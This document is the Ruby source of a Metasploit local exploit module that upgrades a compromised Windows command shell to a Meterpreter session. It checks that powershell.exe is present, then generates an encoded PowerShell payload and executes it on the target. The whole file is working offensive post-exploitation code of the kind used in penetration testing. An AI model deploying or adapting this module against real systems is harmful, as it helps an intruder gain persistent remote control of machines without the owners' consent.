## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'msf/core/exploit/powershell' class Metasploit3 < Msf::Exploit::Local Rank = ExcellentRanking include Exploit::Powershell include Post::File def initialize(info={}) super( update_info( info, 'Name' => 'Windows Command Shell Upgrade (Powershell)', 'Description' => %q{ This module executes Powershell to upgrade a Windows Shell session to a full Meterpreter session. }, 'License' => MSF_LICENSE, 'Author' => [ 'Ben Campbell' ], 'DefaultOptions' => { 'WfsDelay' => 10, }, 'DisclosureDate' => 'Jan 01 1999', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'shell' ], 'Targets' => [ [ 'Universal', {} ] ], 'DefaultTarget' => 0 )) end def exploit psh_path = "\\WindowsPowerShell\\v1.0\\powershell.exe" if file? "%WINDIR%\\System32#{psh_path}" print_status("Executing powershell command line...") command = cmd_psh_payload(payload.encoded, payload_instance.arch.first) cmd_exec(command) else fail_with(Exploit::Failure::NotVulnerable, "No powershell available.") end end end